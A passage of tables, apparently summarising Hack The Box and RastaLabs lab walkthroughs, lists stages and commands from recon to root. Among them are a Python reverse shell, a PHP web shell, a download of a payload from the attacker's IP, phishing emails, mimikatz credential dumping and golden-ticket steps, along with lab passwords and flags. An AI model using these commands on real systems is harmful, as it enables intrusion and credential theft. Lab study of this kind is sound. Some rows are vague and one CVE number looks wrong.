3 | Email Collection | Extracting Emails from Web Page | Manually visit `http://sneakycorp.htb/team.php` and extract the emails to `mails.txt` |
4 | Email Engagement | Sending Emails with swaks | `while read mail; do swaks --to $mail --from it@sneakymailer.htb --header "Subject: Credentials / Errors" --body "goto http://10.10.14.4/" --server 10.10.10.197; done < mails.txt` |
5 | Credential Harvesting | Netcat Listener | `nc -lvp 80` to listen for incoming connections |
6 | Accessing SMTP | Using evolution to Access SMTP | `apt-get install evolution` and configure it with SMTP server `10.10.10.197` and email `paulbyrd@sneakymailer.htb` |
7 | Exploring Sent Items | Checking Sent Emails | Check the sent items for any useful information after accessing the SMTP server |
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Web Server Analysis | Manual inspection of the web application on port 80/tcp |
2 | Vulnerability Analysis | JWT Token Analysis | Decode the JWT token; notice the `kid` parameter pointing to an internal address |
3 | Exploitation | Custom JWT Token Creation | Develop `jwt-token.py` to generate a custom JWT token |
4 | Administration Panel Access | Access with JWT Token | Use the generated JWT token to access the admin panel |
5 | Web Shell Upload | PHP File Upload | Upload a malicious PHP file as allowed by the admin panel |
6 | Reverse Shell | Exploit PHP File | Get a reverse shell as `www-data` from the uploaded PHP file |
7 | Post-Exploitation | User Access | Use `home.tar.gz` from `/var/backups/` to log in as user `noah` with SSH |
8 | Privilege Escalation | Docker Exploitation | Use `docker exec -it webappdev01*` as administrator |
9 | Root Access | CVE-2019-5736 Exploit | Modify and run the CVE-2019-5736 exploit to get root access |
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| 1 | Reconnaissance | Nmap Scan | `nmap -sV -sT -sC -o nmapinitial ai.htb` |
| 2 | Web Enumeration | Manual Inspection | Inspect web application on port 80/tcp, hover over logo for menu |
| 3 | Web Enumeration | Gobuster Directory Scan | `gobuster dir -u http://ai.htb/ -w /usr/share/wordlists/dirb/common.txt` |
| 4 | Audio File Handling | Convert MP3 to WAV | `ffmpeg -i input.mp3 output.wav` |
| 5 | SQL Injection | Extract Database Name | Audio payload: "one open single quote union select database open parenthesis close parenthesis comment database" |
| 6 | SQL Injection | Enumerate Table Names | Audio payload: "one open single quote union select test from test comment database" |
| 7 | SQL Injection | Enumerate Users Table | Audio payload: "one open single quote union select test from users comment database" |
| 8 | SQL Injection | Extract Passwords | Audio payload: "one open single quote union select password from users comment database" |
| 9 | Privilege Escalation | Exploit JDWP Service | Use `jdwp-shellifier.py` with reverse shell payload |
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| 1 | Initial Recon | Nmap Scan | `nmap -sC -sV -sS 10.10.10.184` |
| 2 | FTP Enumeration | Anonymous FTP Access | `ftp 10.10.10.184` (then use `ls`, `cd`, `get` commands to interact) |
| 3 | File Analysis | Reviewing Downloaded Files | `get "Notes to do.txt"`, `get "Confidential.txt"` |
| 4 | Web Enumeration | Enumerate Web Pages | Manual inspection of web application on port 80/tcp |
| 5 | Exploitation | Exploit NVMS-1000 (CVE-2019-2085) | Use CVE details from Exploit-DB and Burp Suite to exploit |
| 6 | Credential Access | Extract Passwords via Directory Traversal | `GET /../../../../../../../../../../../../windows/Users/Nadine/Desktop/Passwords.txt` |
| 7 | Brute Force | SSH Brute Force with Hydra | `hydra -L users.txt -P pass.txt 10.10.10.184 ssh` |
| 8 | SSH Access | Login via SSH | SSH login with found credentials |
| 9 | Privilege Escalation | Exploit NSClient++ 0.5.2.35 | Follow CVE details from Exploit-DB to exploit NSClient++ |
| 10 | Local Port Forwarding | Port Forwarding via SSH | Use SSH port forwarding to interact with local services |
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| 1 | Recon | Nmap Scan | `nmap -sC -sV -sS 10.10.10.171` |
| 2 | Web Enumeration | Manual Visit, Gobuster | Visit `http://10.10.10.171`, `gobuster dir -u http://10.10.10.171/ -w common.txt` |
| 3 | Exploitation | OpenNetAdmin RCE | Use exploit from the `amriunix/ona-rce` repository |
| 4 | Initial Foothold | Reverse Shell | Gain reverse shell as `www-data` |
| 5 | User Access | Password Reuse | SSH as `jimmy` with reused credentials |
| 6 | Internal Service Access | Port Forwarding | Forward port 52846 to local machine and access internal service |
| 7 | Privilege Escalation | Cracking Hash | Crack `sha512` hash to obtain `jimmy`'s password |
| 8 | SSH Key Access | Decrypt SSH Key | Use `ssh2john` and `john` to decrypt Joanna's SSH key |
| 9 | Root Access | Sudo Exploitation of Nano | Use `nano` with sudo to gain root shell based on GTFOBins |
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| 1 | Nmap Scanning | Nmap Scan | `nmap -sC -sV -sS -T4 10.10.10.185` |
| 2 | Enumerating Web Page | Manual Visit | Visit `http://10.10.10.185` |
| 3 | Bypass Login | SQL Injection | Use `'or''='` for both username and password |
| 4 | Uploading Shell | Bypass File Upload Restrictions | `exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' me.jpg` |
| 5 | Gaining Access | Reverse Shell | `http://10.10.10.185/images/uploads/me.php.jpg?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.43",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'` |
| 6 | Enumerating Credentials | Reading Configuration Files | `cat /var/www/Magic/db.php5` |
| 7 | Switching User Shell | User Switching | `su theseus` with password `iamkingtheseus` |
| 8 | Find SUID files | Privilege Escalation | Not specified in the summary |
| 9 | Getting ROOT | Exploitation | Not specified in the summary |
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| 1 | Recon | Nmap Scan | `nmap -sC -sV -sS -T4 10.10.10.229` |
| 2 | Web Enumeration | Manual Visit, Gobuster | Visit `http://10.10.10.229`, `gobuster dir -u http://10.10.10.229/ -w common.txt` |
| 3 | Web Enumeration | Inspect Source Code | Inspect source code of `http://spectra.htb/wp-config.php.save` |
| 4 | Credential Access | Username and Password Discovery | Found credentials: username `administrator`, password `devteam01` |
| 5 | Web Exploitation | WordPress Admin Login | Log in to WordPress admin panel with found credentials |
| 6 | Reverse Shell | Metasploit Reverse Shell | Use `msfconsole` and `exploit/unix/webapp/wp_admin_shell_upload` |
| 7 | Privilege Escalation | Sudo Privileges Exploitation | Use `sudo` with `initctl` for privilege escalation |
| 8 | Privilege Escalation | Editing Service Configuration | Edit `/etc/init/test.conf` to add `chmod +s /bin/bash` |
| 9 | Privilege Escalation | Gaining Root Access | Execute `/bin/bash -p` to spawn a shell with root privileges |
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| 1 | Recon | Nmap Scan | `nmap -sC -sV -p- 10.10.10.225` |
| 2 | Web Enumeration | Inspect Source Code | Inspect source code for CVE-2019-18277 vulnerability |
| 3 | Exploitation | HTTP Request Smuggling | Edit and send crafted HTTP requests to exploit CVE-2019-18277 |
| 4 | Post-Exploitation | Capture Admin Cookie | Reload the home page to capture the admin cookie after the exploit |
| 5 | Privilege Access | Use Credentials Found in Notes | Use credentials from notes to access different services (Chef, Dev Node, Nagios) |
| 6 | Privilege Access | Access Gitea Service | Log in to Gitea service with found credentials |
| 7 | Privilege Access | Find SSH Key for User | Find `id_rsa_marcus` key for user Marcus on Gitea service |
| 8 | Privilege Access | Use SSH Key to Gain Access | Use `id_rsa_marcus` to SSH into the machine as Marcus |
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| 1 | Recon | Nmap Scan | `nmap -sC -sV -p- 10.10.10.220` |
| 2 | Web Enumeration | GitLab Sign In Page | Inspect GitLab sign-in page for vulnerabilities |
| 3 | Exploitation | GitLab 11.4.7 Remote Code Execution | Follow steps from LiveOverflow video & article for RCE |
| 4 | Reverse Shell | Gain Reverse Shell | Use the payload from the video to gain a reverse shell |
| 5 | Post-Exploitation | Find Credentials | Locate `gitlab.rb` in `/opt/backup` to find SMTP password |
| 6 | Privilege Access | Use Found Credentials | Use found SMTP password to change user and gain root access in the Docker container |
| 7 | Privilege Escalation | Escaping Docker Container | Follow steps from the "Escaping Docker Privileged Containers" article to escalate privileges |
| 8 | Root Access | SSH Key | Use the provided `id_rsa` key to SSH into the root account |
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| 1 | Recon | Nmap Scan | `nmap -sC -sV -oA nmap/result 10.10.10.240` |
| 2 | FTP Enumeration | Anonymous FTP Access | `ftp -pi 10.10.10.240` followed by `ls` and `mget *` to download files |
| 3 | Metadata Analysis | ExifTool Analysis | `exiftool *` |
| 4 | Kerberos Attack | GetNPUsers.py Kerberos Preauthentication | `GetNPUsers.py -dc-ip 10.10.10.240 -no-pass -usersfile user.lst LicorDeBellota/` |
| 5 | Hash Cracking | John the Ripper | `john hash -w=/usr/share/wordlists/rockyou.txt` to crack Kerberos hash |
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| 1 | Initial Scanning | Nmap Scan | `nmap -sC -sV -oN nmap 10.10.10.199` |
| 2 | Web Enumeration | Directory Scan | `dirsearch -u 10.10.10.199 -w /opt/common.txt -e *` |
| 3 | Exploitation | Vulnerability in OpenBSD | Use `-schallenge` as a username to bypass authentication |
| 4 | SSH Key Discovery | Cookie Modification | Modify the cookie to include a valid username to reveal SSH keys |
| 5 | SSH Access | Use Discovered SSH Key | `ssh -i id_rsa jennifer@10.10.10.199` |
| 6 | Privilege Escalation | Local Exploit for OpenBSD | `nano authroot; chmod +x authroot; ./authroot` to exploit CVE-2019-19520 / CVE-2019-19522 |
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| 1 | Reconnaissance | Nmap Scan | `nmap -sV -sC -T4 -p- oouch.htb` |
| 2 | Web Enumeration | Directory Scan | `gobuster dir -u http://oouch.htb:5000/ -w big.txt` |
| 3 | OAuth Exploitation | SSRF in Contact Page | Use SSRF to link account with admin |
| 4 | Access Token | Intercept Request with Burp | Intercept `/oauth/connect` request to get token-code |
| 5 | SSH Key Discovery | Accessing SSH Private Keys | Access API to retrieve SSH keys |
| 6 | Docker Exploitation | Exploit Docker UWSGI Service | Log into Docker and exploit UWSGI service running as `www-data` |
| 7 | Privilege Escalation | Exploit Dbus | Exploit Dbus to get a shell as root and obtain `root.txt` |
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| 1 | Recon | Nmap scan | `nmap -sV -sC -v -T4 -oA scans/nmap.full -p- fuse.htb` |
| 2 | Enumeration | Enumerating SMB, HTTP, and RPC | `enum4linux fuse.htb`, `smbclient -L fuse.htb`, `rpcclient -U FABRICORP\\tlavel 10.10.10.193` |
| 3 | Exploitation | Password Spraying | `msf > use auxiliary/scanner/smb/smb_login`, `medusa -h fuse.htb -U users.txt -P wordlist -M smbnt` |
| 4 | Privilege Escalation | Abusing SeLoadDriverPrivilege | Compiling files with Visual Studio, using `eoploaddriver.exe` and `ExploitCapcom.exe` |
| 5 | Post-Exploitation | Accessing Admin Shell | `evil-winrm -u Administrator -H <hash> -i fuse.htb` |
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| 1 | Recon | Nmap scan to find open ports | `nmap -sC -sV -oA /result 10.10.10.212` |
| 2 | Enumeration | Gobuster to find directories | `gobuster dir -u http://s3.bucket.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt` |
| 3 | AWS Configuration | Configure AWS CLI | `aws configure` |
| 4 | Data Extraction | List tables and contents in DynamoDB | `aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/ --no-sign-request`, `aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ --no-sign-request` |
| 5 | Exploitation | Upload PHP reverse shell to the server | `aws --endpoint-url http://s3.bucket.htb/ s3 cp /root/Desktop/HTB/Bucket/shell.php s3://adserver/images/` |
| 6 | Privilege Escalation | Port forwarding and exploiting a web service for code execution as root | `ssh -L 8000:127.0.0.1:8000 roy@10.10.10.212`; create and trigger payload to get root's `id_rsa`; `curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v` |
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| 1 | Recon | Nmap scanning | `nmap -sC -sV -oA nmap/result 10.10.10.233` |
| 2 | Exploitation | Drupalgeddon 2 Forms API Property Injection | `msf6 > use exploit/unix/webapp/drupal_drupalgeddon2` followed by setting options and `run` |
| 3 | Gaining Access | Finding credentials in settings.php | Inspect `/var/www/html/sites/default/settings.php` for MySQL credentials |
| 4 | Database Access | Accessing MySQL database | `mysql -u drupaluser -p -e 'show databases;'` |
| 5 | Data Exfiltration | Dumping usernames and password hashes | `mysql -u drupaluser -p -D drupal -e 'select name,pass from users;'` |
| 6 | Password Cracking | Using John the Ripper to crack password hashes | `john hash -w=/usr/share/wordlists/rockyou.txt` |
| 7 | Access with SSH | SSH into the machine with cracked credentials | `ssh brucetherealadmin@10.10.10.233` |
| 8 | Privilege Escalation | Exploiting snapd (dirty_sock exploit) | Use the dirty_sock exploit to escalate privileges |
| 9 | Capture Flag | Reading user and root flags | `cat user.txt` and `cat root.txt` |
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| 1 | Recon | Nmap scanning | `nmap -sC -sV 10.10.10.181` |
| 2 | Enumeration | Source code analysis, Gobuster | `gobuster dir -w shells.txt -u http://10.10.10.181` |
| 3 | Exploitation | Accessing web shell | Navigate to `http://10.10.10.181/smevk.php`, log in with default creds |
| 4 | Access | SSH key upload | `ssh-keygen`, upload `id_rsa.pub` as `authorized_keys` |
| 5 | Initial Access | SSH as webadmin | `ssh webadmin@10.10.10.181 -i id_rsa` |
| 6 | Privilege Escalation (User) | Using `luvit` to execute commands as sysadmin | `sudo -u sysadmin /home/sysadmin/luvit`, then `os.execute("/bin/bash -i")` |
| 7 | Capture User Flag | Reading user flag | `cat /home/sysadmin/user.txt` |
| 8 | Privilege Escalation (Root) | Modifying `00-header` for command execution | `echo "id" >> /etc/update-motd.d/00-header` |
| 9 | Capture Root Flag | Reading root flag | `echo "cat /root/root.txt" >> /etc/update-motd.d/00-header` |
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| 1 | Initial Scanning | Masscan | `masscan -p 80,135,139,445,443 -sT 10.10.110.0/24 -e tun0` |
| 2 | Host Discovery | Nmap Scan | nmap scan on `10.10.110.10`, nmap scan on `10.10.110.254` |
| 3 | Domain Discovery | CrackMapExec | crackmapexec on `10.10.110.10`, crackmapexec on `10.10.110.254` |
| 4 | Network Mapping | Host Enumeration | Hostnames and IPs: DC01 - 10.10.120.1, FS01 - 10.10.120.5, etc. |
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| 1 | Reconnaissance | Outlook Version Discovery | Check Outlook version on port 443 at `10.10.110.254` |
| 2 | Enumeration | Web Page Analysis | Analyze Rastalabs website on `10.10.110.10` on port 80 |
| 3 | User Profiling | Social Media Analysis | Review Amber Hope's LinkedIn and Instagram profiles |
| 4 | Credential Access | Brute Force | Use Metasploit `auxiliary/scanner/http/owa_login` to brute force |
| 5 | Access | Outlook Login | Log in with credentials `RLAB\ahope` : `Labrador8209` |
| 6 | Flag Discovery | Task Navigation | Navigate to tasks in Outlook to find the flag `RASTA{ph15h1n6_15_h4rdc0r3}` |
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| 1 | Credential Dumping | Vault Credential Extraction | `Get-ChildItem C:\Users\epugh\AppData\Local\Microsoft\Credentials\ -force` |
| 2 | Credential Dumping | Mimikatz Execution | `sekurlsa::dpapi`, `dpapi::cred /in:C:\users\epugh\AppData\Local\Microsoft\Credentials\<HASH>` |
| 3 | Credential Decryption | DPAPI Master Key Usage | `dpapi::cred /in:C:\users\epugh\AppData\Local\Microsoft\Credentials\<HASH> /masterkey:<MASTER_KEY>` |
| 4 | Remote Desktop | Port Forwarding | `portfwd add -L 10.10.14.83 -r 10.10.122.15 -l 3389 -p 3389` |
| 5 | Remote Desktop | Remmina Configuration | Import `.rdp` file, change host, export to `.rdp` file |
| 6 | Remote Desktop | FreeRDP Connection | `xfreerdp sql.rdp /u:epugh_adm /d:rastalabs.local` |
| 7 | Flag Discovery | Task Navigation | Flag found: `RASTA{c00k1n6_w17h_645_n0w}` |
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| 1 | RDP Access | Remote Desktop Protocol | Logged in to web01 (10.10.110.10) and took RDP of sql01 (10.10.122.15) using `epugh_adm` creds |
| 2 | GPO Enumeration | Group Policy Object Enumeration | `Get-NetGPO` |
| 3 | Group Membership | Group Membership Checking | `net user epugh_adm /domain` |
| 4 | GPO Permission Find | GPO Permission Enumeration | `Get-NetGPO -ComputerName fs01.rastalabs.local` |
| 5 | GPO Abuse | Group Policy Object Abuse | `New-GPOImmediateTask -TaskName gop12i -GPODisplayName "Test GPO" -CommandArguments 'net user gopikrishna Ramco@12345 /add' -force` |
| 6 | Add to Administrators | Adding User to Administrators Group | `New-GPOImmediateTask -TaskName gopi131 -GPODisplayName "Test GPO" -CommandArguments 'net localgroup Administrators gopikrishna /add' -force` |
| 7 | Clean Up | Group Policy Object Task Removal | `New-GPOImmediateTask -Remove -Force -GPODisplayName "Test GPO"` |
| 8 | File Permissions | Modifying File Access Control Lists | `icacls flag.txt /grant administrators:F` |
| 9 | Flag Discovery | Retrieving Sensitive Information | Flag found: `RASTA{6p0_4bu53_15_h4rdc0r3}` |
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| 1 | RDP Access | Remote Desktop Protocol | Logged in to web01 (10.10.110.10) and took RDP of sql01 (10.10.122.15) using `epugh_adm` creds |
| 2 | SQL Interaction | SQL Server Management Studio | Start SQL Management Studio, connect via Windows authentication, query Umbraco database |
| 3 | Data Extraction | SQL Query Execution | `SELECT TABLE_NAME FROM umbraco.INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'` |
| 4 | Flag Discovery | SQL Data Retrieval | `select * from Flag`, which revealed the flag `RASTA{d474b4535_4r3_u5u4lly_1n73r3571n6}` |
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| 1 | RDP Access | Remote Desktop Protocol | Logged in to web01 (10.10.110.10) and took RDP of sql01 (10.10.122.15) using `epugh_adm` creds |
| 2 | Credential Dumping | Invoke Mimikatz | Run `p0wnedshell.exe` with admin cmd, option 4, invoke mimikatz to get the NTLM hash of `rweston_da` |
| 3 | Pass-the-Hash | Mimikatz Pass-the-Hash | `sekurlsa::pth /user:rweston_da /domain:rastalabs.local /ntlm:3ff61fa259deee15e4042159d7b832fa` |
| 4 | Golden Ticket | Kerberos Golden Ticket Attack | `kerberos::golden /domain:rastalabs.local /user:rweston_da /sid:S-1-5-21-... /krbtgt:1b6e14bc52b67a2357f7938a8bbceb1b /ticket:C:\Users\GOPIKR~1\Desktop\rweston_da.ticket` |
| 5 | Ticket Injection | Kerberos Ticket Injection | `kerberos::ptt C:\Users\GOPIKR~1\Desktop\rweston_da.ticket` |
| 6 | Flag Discovery | Access Domain Controller | `pushd \\dc01.rastalabs.local\C$` to access the domain controller and discover the flag `RASTA{r4574l4b5_ch4mp10n}` |
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| 1 | Port Forwarding | Local Port Forwarding | `portfwd add -L 10.10.14.83 -r 10.10.121.100 -l 445 -p 445` |
| 2 | Remote Shell Access | MSF psexec / Impacket psexec | Use msf or impacket psexec to get shell on ws01 |
| 3 | Routing | Meterpreter Routing | Add route in meterpreter, set socks4a proxy in msf |
| 4 | Hash Dumping | CrackMapExec with Proxychains | `proxychains crackmapexec 10.10.120.1 -u rweston_da -H ab7b75ff84475be2e8c4dcb7390955c3:3ff61fa259deee15e4042159d7b832fa --ntds drsuapi` |
| 5 | Credential Access | Mimikatz Credential Dump | `dpapi::cred /in:C:\\users\\rweston\\AppData\\Local\\Microsoft\\Credentials\\849B07832DF408F54711A4BD0EB36FD5 /masterkey:bbfdda29906cd49b7ca3e019a1f2dd79d153611a2c3e932520e41b3d228cec844e2ae46faa2abe236612f52da93b26e85d08c562a7288327d318a65b641f23af` |
| 6 | Clipboard Monitoring | PowerShell Clipboard Monitoring | Use PowerShell to monitor clipboard: `powershell -command "& { iwr http://10.10.14.83/emp.bat -OutFile empire_new.bat}"` |
| 7 | RDP Connection | Remote Desktop Connection | `xfreerdp /u:epugh_adm /p:IReallyH8LongPasswords! /v:10.10.110.10` |
| 8 | Flag Discovery | Flag Retrieval | Flag found: `RASTA{c4r3ful_h0w_y0u_h4ndl3_cr3d5}` |
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| 1 | Port Forwarding | Local Port Forwarding | `portfwd add -L 10.10.14.83 -r 10.10.120.1 -l 445 -p 445` |
| 2 | Remote Shell | Impacket psexec | Use impacket psexec to get shell on dc01 |
| 3 | Log Enumeration | Windows Event Logs | `Get-EventLog -LogName "Application"` |
| 4 | Flag Discovery | Log Analysis | Flag found: `RASTA{1nc1d3n7_r35p0nd3r5_l0v3_l065}` |
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| 1 | File Access | Accessing Network Share | `net use Q: \\fs01.rastalabs.local\home$\ahope /user:ahope "Labrador8209"` |
| 2 | File Conversion | Convert PPK to OpenSSH | `puttygen nix01.ppk -O private-openssh -o nix` |
| 3 | SSH Connection | Proxychains with SSH | `proxychains ssh -i nix ahope@10.10.122.20` |
| 4 | Privilege Escalation | Compile and Transfer Exploit | `gcc exp1.c -o exploit` and `proxychains scp -i nix -r exploit ahope@10.10.122.20:/home/ahope` |
| 5 | File Transfer | Secure Copy (SCP) with Proxychains | `proxychains scp -i nix ahope@10.10.122.20:/usr/local/sbin/paycalc /root/Desktop/rasta` |
| 6 | Flag Discovery | Flag Retrieval | Flag found: `RASTA{y0ur3_4_b4lh15}` |
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| 1 | Initial Recon | NMAP Scan | `nmap -p- -sT -sV -sC -oN initial-scan 10.13.38.12` |
| 2 | Web Enumeration | Directory Enumeration with wfuzz | `wfuzz --hc 404 -w raft-small-words.txt http://10.13.38.12/FUZZ` |
| 3 | SMTP Enumeration | smtp-user-enum | `smtp-user-enum -M RCPT -U ./usernames.txt -D humongousretail.com -t 10.13.38.12` |
| 4 | Phishing | Crafting Email | `telnet 10.13.38.12 25` followed by SMTP commands |
| 5 | Access | Citrix XenAPP | Log in with captured credentials |
| 6 | Gaining a Shell | Reverse Shell with msfvenom | `msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.14.15.106 LPORT=10086 -f exe > x86exploit.exe` |
| 7 | Privilege Escalation | Local Exploit Suggester | `use post/multi/recon/local_exploit_suggester` in Metasploit |
| 8 | Network Scanning | Internal Network Scan | Use `auxiliary/server/socks4a` in Metasploit for proxying |
| 9 | Kerberoasting | Harvesting Tickets | `Invoke-Kerberoast` in PowerShell |
| 10 | Password Cracking | hashcat | `hashcat -m 13100 ./mturner rockyou.txt --rules` |
| 11 | SMB Access | smbmap and smbclient | `smbmap -u mturner -p '4install!' -d htb.local -H 172.16.249.201` |
| 12 | Putty File Conversion | putty2john | `putty2john private.ppk > private.hash` |
| 13 | NetScaler Access | SSH with Private Key | `ssh -i id_rsa nsroot@172.16.249.202` |
| 14 | Traffic Analysis | tcpdump | `tcpdump -s 0 -A -n -l` |
| 15 | LDAP Passwords | Capture and Analyze with Wireshark | `tcpdump -w capture.pcap` and analyze with Wireshark |
| 16 | Domain Privilege | WinRM Access | `ruby winrm_shell_with_upload.rb` |
| 17 | Shadow Copies | Diskshadow | `diskshadow` commands to create and expose shadow copies |
| 18 | Domain Admin Access | Pass the Hash | `wmiexec.py -hashes :aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be Administrator@172.16.249.200` |
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| 1 | Reconnaissance | Nmap scan, Enumerating SMB | `nmap -sC -sV -oA nmap/initial 10.10.11.130`, `smbclient -L \\\\10.10.11.130\\` |
| 2 | Gaining Access | Exploiting SMB vulnerability | `smbclient \\\\10.10.11.130\\backups` |
| 3 | Enumeration | Searching for files, Analyzing found files | `get "Azure Diamond.json"` |
| 4 | Privilege Esc. | Using credentials found, Accessing Azure | `evil-winrm -i 10.10.11.130 -u 'azureuser' -p 'MyPassword!'` |
| 5 | Post-Exploitation | Dumping hashes, Cracking hashes | `hashdump`, `john hashes --wordlist=/usr/share/wordlists/rockyou.txt` |
| ID | Stage | Techniques | Commands |
|---|---|---|---|
| 1 | Recon | Scanning with nmap | `nmap -p- --min-rate 10000 10.10.11.225` |
| 2 | SMB Enumeration | Enumerate shares with netexec | `netexec smb 10.10.11.225 --shares` |
| 3 | SMB Access | Access SMB share with smbclient | `smbclient //10.10.11.225/shares -N` |
| 4 | Email Analysis | Analyze backup email | `cat mail` (after retrieving the file) |
| 5 | Subdomain Enum | Brute force subdomains with ffuf | `ffuf -u http://10.10.11.225 -H "Host: FUZZ.gofer.htb" -w wordlist -mc all -ac` |
| 6 | Proxy Access | Fuzzing HTTP methods on proxy | `feroxbuster -u http://proxy.gofer.htb -m GET,POST,PUT,OPTIONS,CONNECT -x php` |